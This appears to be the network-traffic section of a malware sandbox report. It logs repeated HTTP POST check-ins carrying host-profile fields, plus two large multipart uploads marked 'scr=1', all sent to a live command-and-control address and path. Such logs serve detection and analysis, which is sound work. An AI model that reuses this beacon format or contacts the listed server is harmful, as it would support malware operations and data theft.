                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMyMzI=Host: 193.56.146.174Content-Length: 83384Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMyMzI=Host: 193.56.146.174Content-Length: 83384Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
